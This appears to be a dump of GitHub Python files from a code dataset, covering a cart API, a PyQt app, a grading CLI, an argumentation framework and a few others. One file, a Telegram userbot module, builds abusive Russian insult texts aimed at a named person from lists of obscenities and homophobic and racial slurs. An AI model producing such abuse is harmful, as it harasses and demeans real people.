\"env\"\n ts_new = ts.copy()\n\n for state in ts_new.states:\n for act in ts_new.actions['sys_actions']:\n logger.info(' action %s ' % act)\n if ts_new.transitions.find(from_states=state,with_attr_dict={'sys_actions':act}) == []:\n ts_new.transitions.add(state,state,sys_actions = act)\n return ts_new","repo_name":"shaesaert/C-TuLiP","sub_path":"Interface/Transform.py","file_name":"Transform.py","file_ext":"py","file_size_in_byte":14829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34544814080","text":"from .transformations import TransformerList\n\nfrom .transformations import (\n ChoicesToListFW,\n DumpExtraneousAnchorsFW,\n RemoveTranslatedFromRootFW,\n RenameKuidToAnchor,\n ReplaceTruthyStrings,\n SettingsChoicesToListFW,\n XlsformRenames,\n XlsformTranslations,\n)\n\n\nclass ExportConfigs(TransformerList):\n schema = '2'\n flat = False\n immutable = False\n remove_nulls = False\n transformers = ()\n default_settings = ()\n\n def __init__(self, **kwargs):\n for key in list(kwargs):\n if hasattr(self, key):\n val = kwargs.pop(key)\n setattr(self, key, val)\n super().__init__(**kwargs)\n\n def fw(self, content, **kwargs):\n return self._apply_transformers(content, direction='fw', **kwargs)\n\nclass DefaultExportConfigs(ExportConfigs):\n schema = '2'\n flat = False\n\nclass DefaultExportConfigsSchema1(ExportConfigs):\n schema = '1'\n flat = True\n transformers = (\n SettingsChoicesToListFW,\n )\n\nclass XlsformExport(ExportConfigs):\n schema = '1'\n flat = True\n transformers = (\n ReplaceTruthyStrings,\n DumpExtraneousAnchorsFW,\n XlsformRenames,\n XlsformTranslations,\n RemoveTranslatedFromRootFW,\n SettingsChoicesToListFW,\n )\n\n\nclass KoboXlsformExport(ExportConfigs):\n schema = '1'\n flat = True\n transformers = (\n ReplaceTruthyStrings,\n RenameKuidToAnchor,\n ChoicesToListFW,\n )\n","repo_name":"dorey/a1d05eba1","sub_path":"a1d05eba1/export_configs.py","file_name":"export_configs.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1018757660","text":"from sqlalchemy.orm import Session\n\nfrom . import models, schemas\n\n\ndef get_items(db: Session, skip: int = 0, limit: int = 100):\n print(db.query(models.Item).offset(skip).limit(limit).all())\n return db.query(models.Item).offset(skip).limit(limit).all()\n\n\ndef get_item(db: Session, id: id):\n item = db.query(models.Item).get(id).__dict__\n print(\"item\")\n\n print(item)\n return db.query(models.Item).get(id).__dict__\n\n\ndef get_cart(db: Session, id: id):\n print(dir(db.query(models.Cart).get(id)))\n query = db.query(models.Cart).get(id)\n output = {\"cartitems\": query.cartitems, \"id\": query.id}\n print(\"output\")\n print(output)\n return db.query(models.Cart).get(id)\n\n\n# def get_display_cart(db: Session, id: id)\n# cart = get_cart(id)\n# cart_items = [ cart_item.__dict__ for cart_item in cart.cartitems]\n# new_cart =\n# for cart_item in cart_items:\n# item = get_item(cart_item.item_id)\n# new_cart_item = {cart_item[k] = v for (k,v) in item }\n\n\ndef create_item(db: Session, item: schemas.ItemCreate):\n db_item = models.Item(**item.dict())\n print(db_item)\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n return db_item\n\n\ndef create_cart_item(db: Session, cart_id, item_id):\n item = db.query(models.Item).get(cart_id)\n cart = db.query(models.Cart).get(item_id)\n db_item = models.CartItem(\n item=db.query(models.Item).get(item_id),\n cart=db.query(models.Cart).get(cart_id),\n quantity=1,\n )\n print(db_item)\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n return db_item\n\n\ndef create_cart(\n db: Session,\n # cart,\n item_id,\n):\n # db_item = models.Cart(**cart.dict())\n # db_item = models.Cart(items=[db.query(models.Item).get(item_id)])\n cart = models.Cart(cartitems=[])\n print(cart)\n db.add(cart)\n # db.add(cart)\n db.commit()\n db.refresh(cart)\n return cart\n\n\ndef add_to_cart(db: Session, cart_id, item_id, remove=False):\n # def create_user_item(db: Session, item: schemas.ItemCreate, user_id: int):\n print(\"herro\")\n cart = db.query(models.CartItem).filter(models.CartItem.cart_id == cart_id).first()\n\n print(\"cart\")\n print(cart)\n print(\"cartid\")\n print(cart_id)\n print(\"item_id\")\n print(item_id)\n cart_item_result = db.query(models.CartItem).filter(\n models.CartItem.cart_id.like(cart_id),\n models.CartItem.item_id.like(item_id),\n )\n print(\"first\")\n print(cart_item_result.first())\n cart_item = cart_item_result.first()\n print(\"cart_item\")\n print(cart_item)\n\n if remove:\n cart_item.quantity -= 1\n if cart_item.quantity == 0:\n db.delete(cart_item)\n else:\n if cart_item == None:\n print(\"no cart item\")\n cart_item = models.CartItem(\n item=db.query(models.Item).get(item_id),\n cart=db.query(models.Cart).get(cart_id),\n quantity=1,\n )\n print(cart_item)\n print(\"quantity\")\n print(cart_item.quantity)\n db.add(cart_item)\n db.commit()\n db.refresh(cart_item)\n else:\n print(cart_item.quantity)\n if cart_item.quantity == None:\n cart_item.quantity = 1\n cart_item.quantity += 1\n\n item = db.query(models.Item).get(item_id)\n cart = db.query(models.Cart).get(cart_id)\n print(\"cart\")\n print(cart)\n db.commit()\n return cart\n\n\ndef add_to_cart_new(db: Session, cart_id, item_id):\n cart_item = create_cart_item(db, cart_id, item_id)\n cart = db.query(models.Cart).get(cart_id)\n return cart\n\n\ndef remove_from_cart(db: Session, cart_id, item_id):\n pass\n","repo_name":"whiterabbitcoding/ecommerce-backend-fastapi","sub_path":"app/sql_app/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70749415162","text":"import sys\nfrom PyQt5 import QtWidgets as qtw\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\n\nfrom MainWidget import MainWidget\n\n\nclass App(qtw.QMainWindow):\n\n def __init__(self, parentApp, data):\n super().__init__()\n self.title = 'OCVID OpenCV Integrated Development'\n self.left = 0\n self.top = 0\n self.width = 640\n self.height = 480\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.parent = parentApp\n self.setWindowIcon(QIcon('./opencv-logo.ico'))\n self.data = data\n self.data.app = self\n\n self.table_widget = MainWidget(self)\n self.setCentralWidget(self.table_widget)\n self.statusBar().showMessage('Loaded.')\n self.initMenu()\n self.show()\n\n def initMenu(self):\n mainMenu = self.menuBar()\n fileMenu = mainMenu.addMenu('File')\n editMenu = mainMenu.addMenu('Edit')\n viewMenu = mainMenu.addMenu('View')\n #streamMenu = mainMenu.addMenu('Stream')\n #helpMenu = mainMenu.addMenu('Help')\n\n for x in qtw.QStyleFactory.keys():\n styleAct = qtw.QAction(QIcon(''), x, self)\n styleAct.setStatusTip('Set style to ' + x)\n styleAct.triggered.connect(lambda checked, style=x: self.handleStyleChanged(\n qtw.QStyleFactory.create(style)))\n viewMenu.addAction(styleAct)\n\n saveAct = qtw.QAction(QIcon(''), \"Save\", self)\n saveAct.setStatusTip('Save current python code')\n saveAct.setShortcut('Ctrl+S')\n saveAct.triggered.connect(self.handleSave)\n saveAsAct = qtw.QAction(QIcon(''), \"Save as...\", self)\n saveAsAct.setStatusTip('Save current python code as...')\n saveAsAct.setShortcut('Ctrl+Shift+S')\n saveAsAct.triggered.connect(self.handleSaveAs)\n loadAct = qtw.QAction(QIcon(''), \"Open\", self)\n loadAct.setStatusTip('Open python file')\n loadAct.setShortcut('Ctrl+O')\n loadAct.triggered.connect(self.handleLoad)\n\n exitAct = qtw.QAction(QIcon('exit24.png'), 'Exit', self)\n exitAct.setShortcut('Ctrl+Q')\n exitAct.setStatusTip('Exit application')\n exitAct.triggered.connect(self.close)\n fileMenu.addAction(saveAct)\n fileMenu.addAction(saveAsAct)\n fileMenu.addAction(loadAct)\n fileMenu.addAction(exitAct)\n\n commentAct = qtw.QAction(QIcon(''), \"Comment block\", self)\n commentAct.setStatusTip('Comment line')\n commentAct.setShortcut('Ctrl+/')\n commentAct.triggered.connect(self.handleComment)\n\n importsAct = qtw.QAction(QIcon(''), \"Edit imports\", self)\n importsAct.setStatusTip('Change which modules are imported')\n importsAct.triggered.connect(self.editImports)\n editMenu.addAction(commentAct)\n\n def setMessage(self, log):\n print(\"Setting message\", log)\n self.statusBar().showMessage(log)\n\n def handleStyleChanged(self, style):\n self.parent.setStyle(style)\n\n def handleSave(self):\n print(\"TODO save\")\n\n def handleSaveAs(self):\n print(\"TODO save as\")\n\n def handleLoad(self):\n print(\"TODO load\")\n\n def handleComment(self):\n print(\"TODO comment\")\n\n def editImports(self):\n print(\"TODO imports\")\n\n def closeEvent(self, event):\n self.data.stopVid()\n event.accept() # let the window close\n","repo_name":"frewes/ocvid","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21876797142","text":"# огромное спасибо за скрипт https://github.com/PSPshnik\n#.tralka <кол-во слов> <Сколько капса(в %)> <Имя обидчика>\nfrom .. import loader, utils\nimport logging\nimport random\n\nversion = 4.8\nsentence_min = 3\nsentence_max = 10\n# paragraph_min = 10\n# paragraph_max = 20\nprint_length = False\n\nm = ['некультурный', 'необразованный',\n 'гороховый', 'мудовый', 'глупенький',\n 'малолетний', 'ебучий', 'гнилой',\n 'собачий', 'ссаный', 'моржовый',\n 'вредный', 'прибабахнутый', 'ебаный',\n 'волшебный', 'сказочный', 'маленький',\n 'приёмный', 'сральный', 'пердёжный',\n 'обоссанный', 'обосранный', 'чёртов',\n 'грязный', 'тупой', 'нищий', 'родной', 'мусорный',\n 'дегенеративный',\n 'распроклятый', 'турецкий', 'блядский',\n 'ёбаный', 'хуев', 'хуёвый', 'ебанутый',\n 'ёбнутый', 'грязный', 'зелёный', 'сукин',\n 'лысый', 'пожилой', 'вонючий', 'чокнутый']\n\nf = ['некультурная', 'необразованная',\n 'гороховая', 'мудовая', 'глупенькая',\n 'малолетняя', 'ебучая', 'гнилая',\n 'собачья', 'ссаная', 'моржовая',\n 'вредная', 'прибабахнутая', 'ебаная',\n 'волшебная', 'сказочная', 'маленькая',\n 'приёмная', 'сральная', 'пердёжная',\n 'обоссанная', 'обосранная', 'чёртова',\n 'грязная', 'тупая', 'нищая',\n 'родная', 'мусорная', 'дегенеративная',\n 'распроклятая', 'турецкая', 'блядская',\n 'ёбаная', 'хуева', 'хуёвая', 'ебанутая',\n 'ёбнутая', 'грязная', 'зелёная', 'сукина',\n 'лысая', 'пожилая', 'вонючая', 'чокнутая']\n\ns = ['некультурное', 'необразованное',\n 'гороховое', 'мудовое', 'глупенькое',\n 'малолетнее', 'ебучее', 'гнилое',\n 'собачье', 'ссаное', 'моржовое',\n 'вредное', 'прибабахнутое', 'ебаное',\n 'волшебное', 'сказочное', 'маленькое',\n 'приёмное', 'сральное', 'пердёжное',\n 'обоссанное', 'обосранное', 'чёртово', 'грязное',\n 'тупое', 'нищее', 'родное', 'мусорное', 'дегенеративное',\n 'распроклятое', 'турецкое', 'блядское',\n 'ёбаное', 'хуево', 'хуёвое', 'ебанутое',\n 'ёбнутое', 'грязное', 'зелёное', 'сукино',\n 'лысое', 'пожилое', 'вонючее', 'чокнутое']\n\nk = ['из жопы', 'в ловушке', 'в бане',\n 'на хуе', 'в дурке', 'из стула', 'в дурке ебаной',\n 'в хуипе', 'в запечатанной колоде']\n\nn = ['негра', 'джокера', 'тупого говна', 'хуйни ебаной',\n 'хуя', 'феминизма', 'говна',\n 'от народа', 'хуйни', 'Навального',\n 'ловушкера', 'Путина', 'русского народа', 'вонючки', 'с функцией жопа']\n\no = ['пиздец', 'блять', 'попался в ловушку',\n 'тебя забайтили', 'ловушка джокера', 'тебе бан',\n 'фак ю', 'убейся', 'соси',\n 'ёбаный твой рот', 'срал я на тебя',\n 'убейся об стену', 'соси пизду', 'у тебя хуй вместо носа',\n 'купи мою подписку на ютубе',\n 'хуй соси', 'губой тряси', 'я съел деда',\n 'насрал в пизду',\n '22 июня 1642 года Карл Первый поднял королевский штандарт (королевский флаг), что по английским традициям означало объявление войны',\n 'мне этот мир абсолютно понятен',\n 'я был на этой планете бесконечным множеством',\n 'но тебе этого не понять',\n 'иди преисполняться в гранях каких-то',\n 'пиздуй - бороздуй',\n 'бредишь', 'вот я какну и смываю, и ты так делай',\n 'не надо шутить с войной',\n 'твою дочку ебут', 'залупаешься',\n 'хули ты пиздишь', 'поцелуй лошадиную сраку',\n 'распронаёб тебя', 'ъеь', 'ьуь', 'аье',\n 'какого хуя они в другом порядке разложены',\n 'ай фак ю булщит щит',\n 'он за углом сидит и тебе на голову дрочит',\n 'армяне в нарды играют', 'жирняк гай',\n 'иди сюда, попробуй меня трахнуть, я тебя сам трахну',\n 'что ты там делаешь', 'беги за горизонт',\n 'попал в дурку ебаную', 'был бы ты человек', 'нахуй',\n 'запомни', 'хули ты сюда лезешь',\n 'высрана твоя морда', 'возьми салфетку',\n 'я бы никому не проиграл',\n 'иди нахуй', 'иди',\n 'я тебя ебал, гад, срать на нас говна',\n 'я тебя ебал гадить нас срать так',\n 'держи в курсе', 'несёшь хуйню какую-то',\n 'русские вперёд']\n\nd = ['бекон', 'сыр', 'пенис', 'член',\n 'мудозвон', 'лицемер', 'лжец',\n 'хуй', 'гомогей', 'чай', 'рукоблуд',\n 'долбан', 'пидорас', 'сын', 'козёл',\n 'газ', 'фашист', 'пососатель',\n 'дегенерат', 'спермобак', 'долбоёб',\n 'клоун', 'паразит', 'письколёт',\n 'мудак', 'спидозник', 'пудж', 'кремлебот',\n 'объебос', 'дурачок', 'хуебес', 'пиздолёт',\n 'педик', 'педик - медведик', 'дебил', 'дифичент',\n 'кок сакер', 'пиздабол', 'аутист', 'гадёныш', 'выблядок',\n 'глиномес', 'даун', 'хер', 'булщит', 'засранец',\n 'инвалид', 'дурак', 'болван',\n 'минетчик', 'онанист', 'напёрдыш',\n 'чилипиздрик', 'пиздюк', 'гей', 'ловушкер',\n 'пендос', 'наркоман', 'алкаш', 'жиробас',\n 'рак', 'укурок', 'крокодил', 'ебальник',\n 'секс-раб', 'потомок', 'дрыщ',\n 'урод', 'карлик', 'дед инсайд', 'волк',\n 'калыван', 'либераст', 'шакал',\n 'педофил', 'бомж', 'пингвин', 'жираф',\n 'огурец', 'салат', 'лук', 'картофель',\n 'деградант', 'спам', 'человек', 'гуманитарий',\n 'язык', 'стол', 'PEP-8', 'ебалай', 'враг', 'недруг', 'супостат',\n 'кретин', 'козолуп', 'свинарь',\n 'униженец', 'опущенец', 'муравей',\n 'дятел', 'козёл', 'жирняк', 'говноед',\n 'чёрт', 'суслик', 'идиот', 'жлоб', 'мерзавец',\n 'негодяй', 'подлец', 'ублюдок', 'гад',\n 'гавкошмыг', 'чикибамбонатор', 'чикибамбог',\n 'джокер', 'жмых', 'жмышок', 'жмышонок',\n 'куколд', 'ебалай', 'ушлёпок',\n 'хуесос', 'членосос', 'чикибамбонёнок',\n 'чикибан', 'чикибомбастер', 'чайник',\n 'чикибамбонизатор', 'чикибамбог']\n\ndd = ['куколда', 'хуйолда', 'мудила', 'блядина', 'гнида',\n 'пидрила', 'тварь', 'сука', 'сперма', 'пидорасина',\n 'либераха', 'срака', 'жопа', 'петушара', 'залупа',\n 'хуета', 'пупа', 'петька', 'блядь', 'елда', 'тряпка',\n 'яма', 'хуемразь', 'срань', 'мошонка', 'ссанина',\n 'вагина', 'пизда', 'пососательница',\n 'ловушка', 'паста', 'макаронина',\n 'жиробасина', 'радфемка', 'шлюха', 'прошмандовка',\n 'жируха', 'доска', 'уродина',\n 'плоскодонка', 'скотина', 'омега',\n 'черешня', 'ватрушка', 'шишка',\n 'ракушка', 'свинья', 'какашка',\n 'гнилушка', 'лягушка', 'свинушка',\n 'картошка', 'волчара', 'дочь', 'пешка',\n 'давалка', 'пососательница',\n 'колбаса', 'собака', 'мохнатка', 'жижа',\n 'какашка', 'какуля', 'душа', 'вражина',\n 'падла', 'болезнь', 'бумажка', 'вонючка',\n 'тень', 'гадина', 'чикибамбони',\n 'микробамбони', 'мышь', 'мразь',\n 'мразина', 'мразота']\n\nddd = ['удобрение', 'уёбище', 'ебло', 'хуйло',\n 'чудище', 'говно', 'яблоко', 'животное',\n 'дерьмо', 'блядотище', 'дитя', 'порождение',\n 'очко', 'растение', 'ебало', 'ведро',\n 'мудило', 'хуепучило']\n\ngens = ['03', '14', '25', '8',\n '06', '16', '26', '30',\n '41', '52', '303', '330', '0',\n '414', '441', '1', '8',\n '525', '552', '2', '067',\n '167', '267', '306', '416',\n '526', '07', '8', '8', '8',\n '17', '27', '8', '8', '8',\n '307', '417', '527', '8', '8',\n '3067', '4167', '5267']\n\narray = [d, dd, ddd, m, f, s, k, n, o]\n\n\ndef generate(word_count: int, caps_rate: int, name: str):\n res = []\n priv = ''\n if name:\n priv += f'Привет, {name}! '\n caps_rate %= 100\n priv += 'Ты, '\n word_count_now = 0\n while word_count_now < word_count:\n tempi = word_count + 1\n while word_count_now + tempi > word_count:\n random.seed()\n y = random.choice(gens)\n x = []\n for j in y:\n x.append(random.choice(array[int(j)]))\n x = ' '.join(x)\n tempi = len(x.split())\n res.append(x)\n word_count_now += tempi\n res = ', '.join(res)\n res = res.split()\n count = 0\n kek = random.randint(sentence_min, sentence_max)\n for v in range(len(res)):\n if res[v].endswith(','):\n count += 1\n if count % kek == 0:\n count = 0\n random.seed()\n kek = random.randint(sentence_min, sentence_max)\n res[v] = res[v][:-1] + '.'\n if v < len(res) - 1:\n res[v + 1] = res[v + 1][0].upper() + res[v + 1][1:]\n res[0] = priv + res[0]\n res = ' '.join(res).split()\n for v in range(len(res)):\n random.seed()\n z = random.randint(0, 99)\n if z < caps_rate:\n res[v] = res[v].upper()\n return ' '.join(res) + '.'\n# КТО ТО ЭТО ЕЩЁ ЧИТАЕТ?\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef register(cb):\n cb(Tralka())\n\n\nclass Tralka(loader.Module):\n \"\"\"Generates pastes\"\"\"\n\n def __init__(self):\n self.name = _(\"Pastes\")\n self._me = None\n self._ratelimit = []\n\n async def client_ready(self, client, db):\n self._db = db\n self._client = client\n self._me = await client.get_me()\n\n async def tralkacmd(self, message):\n \"\"\".tralka \"\"\"\n args = utils.get_args(message)\n chatid = str(message.chat_id)\n if len(args) < 2:\n await utils.answer(message, \"Проверь, ты всё указал правильно?\")\n elif len(args) == 2:\n await utils.answer(message, generate(int(args[0]), int(args[1]), None))\n else:\n await utils.answer(message, generate(int(args[0]), int(args[1]), args[2]))\n","repo_name":"AivenGog/ftg-modules","sub_path":"obzivalka.py","file_name":"obzivalka.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"ru","doc_type":"code","stars":21,"dataset":"github-code","pt":"40"} +{"seq_id":"38975642265","text":"#! /usr/bin/python\n\nfile_name = \"data.txt\"\n\n# open(file, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None)\nf = open(file_name)\t\t\t\t\t# f is file object\nf = open(file_name, \"rt\")\t\t\t# The same, \"rt\" means 'read text'\nf.close()\n\ntry:\n\tf = open(file_name, \"rt\")\n\tstr = f.read(20);\t\t\t\t# Read at most 20 characters\nfinally:\n\tf.close();\nprint(str)\n\n# Equivalent to previous, except f.read()\nwith open(file_name, \"rt\") as f:\t# 'With' statement context manager\n\tstr = f.read();\t\t\t\t\t# Read entire file\n\t# f is closed here\nprint(str)\n\nwith open(file_name, \"rt\") as f:\t# f = open(file_name) is the same\n\tline1 = f.readline()\t\t\t# Read one line including '\\n'\n\tline2 = f.readline()\nprint(line1, line2, sep='')\n\nwith open(file_name, \"rt\") as f:\n\tlines = f.readlines();\nprint(lines)\nprint()\n\nf = open(file_name)\ncount = 0\nfor line in f:\t\t\t\t\t\t# For loop with file object\n\tcount += 1\n\tprint(count, \") \", line, sep='', end='')\nf.close()\nprint()\n\nf = open(\"new_data.txt\", \"wt\")\nf.write(\"First line\\n\");\t\t\t# No '\\n' automatically at the end of line\nf.write(\"Second line\\n\");\nli = [\"aaa\\n\", \"bbb\\n\", \"ccc\"]\t\t# No '\\n' automatically at the end of each line\nf.writelines(li)\nf.close()\n\nnums = [50, 60, 70, 80, 90]\t\t\t# Bytes only\nbarr = bytearray(nums)\noutf = open(\"data.bin\", \"wb\")\t# \"wb\" means 'write binary'\noutf.write(barr)\noutf.close()\n\ninf = open(\"data.bin\", \"rb\")\nli = list(inf.read())\nprint(li)\n","repo_name":"oleg0x/Python_model_examples","sub_path":"files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24353049738","text":"student_list = []\n# Now integrating to Git\n\nclass Student(object):\n\n def __init__(self, name):\n self.name = name\n self.marks = []\n\n def average_mark(self):\n divisor = len(self.marks)\n if divisor == 0:\n return 0\n total = sum(self.marks)\n return total / divisor\n\n\ndef create_student():\n name = input(\"Please enter the student's name: \")\n return Student(name)\n\n\ndef append_mark(student, mark):\n student.marks.append(mark)\n\n\ndef print_student_details(student):\n print(\"student's name \", student.name)\n print(\"student's average \", student.average_mark())\n\n\ndef print_student_list(students):\n for i, student in enumerate(students):\n print(\"ID: {}\".format(i))\n print_student_details(student)\n\n\ndef menu():\n selection = input(\"Enter 'p' to print the student's list, \"\n \"'s' to add a new student, \"\n \"'a' to add a mark to a student, or \"\n \"'q' to quit: \")\n while selection != 'q':\n\n if selection == 'p':\n print_student_list(student_list)\n elif selection == 's':\n student = create_student()\n student_list.append(student)\n elif selection == 'a':\n print_student_list(student_list)\n student_id = int(input(\"enter the student ID to add a mark to: \"))\n student = student_list[student_id]\n mark = int(input(\"Enter the new mark to be added: \"))\n append_mark(student, mark)\n\n selection = input(\"Enter 'p' to print the student's list, \"\n \"'s' to add a new student, \"\n \"'a' to add a mark to a student, or \"\n \"'q' to quit \")\n\n\nmenu()\n","repo_name":"demxic/Grading-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28607440852","text":"import alias as al\n\nclass Argument(object):\n \n def __init__(self, name, framework):\n self.name = name\n self.framework = framework\n self.attacks = set()\n self.attacksref = set()\n\n def __repr__(self):\n return '\\'' + self.name + '\\''\n\n def __str__(self):\n string = 'Argument \\'' + self.name + '\\' : ['\n atts = []\n for att in self.attacks:\n atts.append('\\'' + att.name + '\\'')\n string = string + (', '.join(atts))\n string = string + ']'\n return string\n\n def __iter__(self):\n for arg in self.attacks:\n yield arg\n\n def __getitem__(self,arg):\n if arg in self.attacks:\n return self.framework[arg]\n else:\n raise al.FrameworkException('Argument \\'%s\\' is not attacked by argument \\'%s\\'' %(arg, self.name))\n\n def add_attack(self, arg):\n if isinstance(arg, al.Argument):\n self.attacks.add(arg)\n self.attacksref.add(arg.name)\n elif isinstance(arg, basestring):\n self.attacks.add(self.framework[arg])\n self.attacksref.add(arg)\n\n def remove_attack(self, arg):\n if isinstance(arg, al.Argument):\n self.attacks.remove(arg)\n self.attacksref.remove(arg.name)\n elif isinstance(arg, basestring):\n self.attacks.remove(self.framework[arg])\n self.attacksref.remove(arg)\n\n # Determines whether the argument is legally in within a given labelling\n def is_legally_in(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.inargs:\n raise al.LabellingException(\"Argument is not labelled in.\")\n allout = True\n for att in labelling.framework.get_attackers(self.name):\n if att in labelling.inargs:\n allout = False\n break\n if att in labelling.undecargs:\n allout = False\n break\n return allout\n\n # Determines whether the argument is legally out within a given labelling\n def is_legally_out(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.outargs:\n raise al.LabellingException(\"Argument is not labelled out.\")\n\n onein = False\n for att in labelling.framework.get_attackers(self.name):\n if att in labelling.inargs:\n onein = True\n break\n\n return onein\n\n # Determines whether the argument is legally undecided within a given labelling\n def is_legally_undec(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.undecargs:\n raise al.LabellingException(\"Argument is not labelled undecided.\")\n\n allout = True\n onein = False\n\n for att in labelling.framework.get_attackers(self.name):\n if att not in labelling.outargs:\n allout = False\n if att in labelling.inargs:\n onein = True\n break\n\n return not (allout | onein)\n\n def is_illegally_in(self, labelling):\n return not self.is_legally_in(labelling)\n\n def is_illegally_out(self, labelling):\n return not self.is_legally_out(labelling)\n\n def is_illegally_undec(self, labelling):\n return not self.is_legally_undec(labelling)\n\n def is_super_illegally_in(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.inargs:\n raise al.LabellingException(\"Argument is not labelled in.\")\n\n sii = False\n if self.is_illegally_in(labelling):\n for att in labelling.framework.get_attackers(self.name):\n if att in labelling.inargs:\n if labelling.framework.get_arg_obj(att).is_legally_in(labelling):\n sii = True\n break\n if att in labelling.undecargs:\n if labelling.framework.framework[att].is_legally_undec(labelling):\n sii = True\n break\n\n return sii \n","repo_name":"alias-org/alias","sub_path":"alias/classes/argument.py","file_name":"argument.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16665675347","text":"from pathlib import Path\n\nfrom publish.document import doc_text\nfrom publish.publication import get_pub\n\n\n# def test_blog_images():\n# return verify_blog_images()\n\n\n# def test_book_images():\n# return verify_book_images()\n\n\n# def test_course_images():\n# return verify_course_images()\n\n\n# def test_textbook_images():\n# return verify_textbook_images()\n\n\ndef test_image_pages():\n doc_path = Path(f\"Documents/Shrinking-World-Pubs/journey/Pub\")\n pub = get_pub('journey')\n # settings = read_json(pub_json_path(pub.name, pub.doc_path))\n # settings = read_json(\"static/js/journey.json\")\n image_path = pub.image_path\n return doc_text(doc_path / \"JFK.md\", image_path) + doc_text(\n doc_path / \"MushroomCloud.md\", image_path\n )\n","repo_name":"Mark-Seaman/GhostWriter","sub_path":"probe/probe_images.py","file_name":"probe_images.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"73434441079","text":"import unittest, time, main\n\nimport numpy as np\n\nfrom opentamp.core.parsing import parse_domain_config, parse_problem_config\nfrom opentamp.pma import hl_solver, robot_ll_solver\nfrom opentamp.policy_hooks import policy_solver, tamp_agent, policy_hyperparams, policy_solver_utils\n\ndef load_environment(domain_file, problem_file):\n domain_fname = domain_file\n d_c = main.parse_file_to_dict(domain_fname)\n domain = parse_domain_config.ParseDomainConfig.parse(d_c)\n p_fname = problem_file\n p_c = main.parse_file_to_dict(p_fname)\n problem = parse_problem_config.ParseProblemConfig.parse(p_c, domain)\n params = problem.init_state.params\n return domain, problem, params\n\ndef traj_retiming(plan, velocity):\n baxter = plan.params['baxter']\n rave_body = baxter.openrave_body\n body = rave_body.env_body\n lmanip = body.GetManipulator(\"left_arm\")\n rmanip = body.GetManipulator(\"right_arm\")\n left_ee_pose = []\n right_ee_pose = []\n for t in range(plan.horizon):\n rave_body.set_dof({\n 'lArmPose': baxter.lArmPose[:, t],\n 'lGripper': baxter.lGripper[:, t],\n 'rArmPose': baxter.rArmPose[:, t],\n 'rGripper': baxter.rGripper[:, t]\n })\n rave_body.set_pose([0,0,baxter.pose[:, t]])\n\n left_ee_pose.append(lmanip.GetTransform()[:3, 3])\n right_ee_pose.append(rmanip.GetTransform()[:3, 3])\n time = np.zeros(plan.horizon)\n # import ipdb; ipdb.set_trace()\n for t in range(plan.horizon-1):\n left_dist = np.linalg.norm(left_ee_pose[t+1] - left_ee_pose[t])\n right_dist = np.linalg.norm(right_ee_pose[t+1] - right_ee_pose[t])\n time_spend = max(left_dist, right_dist)/velocity[t]\n time[t+1] = time_spend\n return time\n\n# Useful for creating sample plans\ndef get_random_cloth_init_poses(num_cloths, table_pos):\n cur_xy = [-.25, -.525]\n cloth_poses = []\n for i in range(num_cloths):\n if not (i+1) % 4:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(-0.4, -0.5), np.random.uniform(0.1, 0.15)])\n cur_xy[0] = max(cur_xy[0], -.25)\n else:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(0.1, 0.15), np.random.uniform(-0.025, 0.025)])\n pos = np.array(table_pos) + np.array([cur_xy[0], cur_xy[1], 0.05])\n cloth_poses.append(pos.tolist())\n return cloth_poses\n\ndef get_random_cloth_init_pose(table_pos):\n cur_xy = np.array([np.random.uniform(-0.2, 0.1), np.random.uniform(0.1, 0.5)])\n pos = np.array(table_pos) + np.array([cur_xy[0], cur_xy[1], 0.05])\n return pos\n\n# Useful for creating sample plans\ndef get_random_cloth_end_poses(num_cloths, basket_init_pos):\n cur_xy = [-.11, .11]\n cloth_poses = []\n for i in range(num_cloths):\n if not (i+1) % 4:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(-0.21, -0.23), np.random.uniform(0.045, 0.055)])\n cur_xy[0] = max(cur_xy[0], -.11)\n else:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(0.045, 0.055), np.random.uniform(-0.01, 0.01)])\n pos = np.array(basket_init_pos) + np.array([cur_xy[0], cur_xy[1], 0.04])\n cloth_poses.append(pos.tolist())\n return cloth_poses\n\n\nclass TestPolicySolver(unittest.TestCase):\n def test_policy_solver(self):\n domain_fname = '../domains/laundry_domain/laundry.domain'\n d_c = 